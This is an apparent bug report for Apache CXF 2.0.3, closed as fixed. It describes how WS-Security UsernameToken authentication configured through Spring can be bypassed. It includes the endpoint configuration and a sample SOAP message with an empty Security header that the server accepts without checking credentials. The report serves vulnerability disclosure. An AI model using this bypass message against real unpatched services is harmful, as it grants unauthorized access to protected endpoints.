Details
-
Bug
-
Status: Closed
-
Critical
-
Resolution: Fixed
-
2.0.3
-
None
-
Tomcat 5.5, Spring 2 and CXF 2.0.3 for the server and Flex WS-client
-
Moderate
Description
It is possible to bypass the security checks configured with WS-Security.
Server configured with an Username Token WS-Security authentication with Spring :
<jaxws:endpoint id="helloWorld" implementor="service.impl.HelloWorldImpl" address="/HelloWorld">
<jaxws:inInterceptors>
<bean class="org.apache.cxf.binding.soap.saaj.SAAJInInterceptor"/>
<bean class="org.apache.cxf.ws.security.wss4j.WSS4JInInterceptor">
<constructor-arg>
<map>
<entry key="action" value="UsernameToken"/>
<entry key="passwordType" value="PasswordDigest"/>
<entry key="passwordCallbackClass" value="service.security.ServerPasswordHandler"/>
</map>
</constructor-arg>
</bean>
<bean class="org.apache.cxf.interceptor.LoggingInInterceptor"/>
<bean class="org.apache.cxf.interceptor.LoggingOutInterceptor"/>
</jaxws:inInterceptors>
</jaxws:endpoint>
When a SOAP message is created and sent with the following header, the server do not process the authentication and return the response :
<SOAP-ENV:Envelope>
<SOAP-ENV:Header>
<ns0:Security>
<ns0:wsse>Security</ns0:wsse>
</ns0:Security>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns0:sayHi>
<name>Loïc</name>
</ns0:sayHi>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
So it is possible to bypass all the security checks configured and to use it.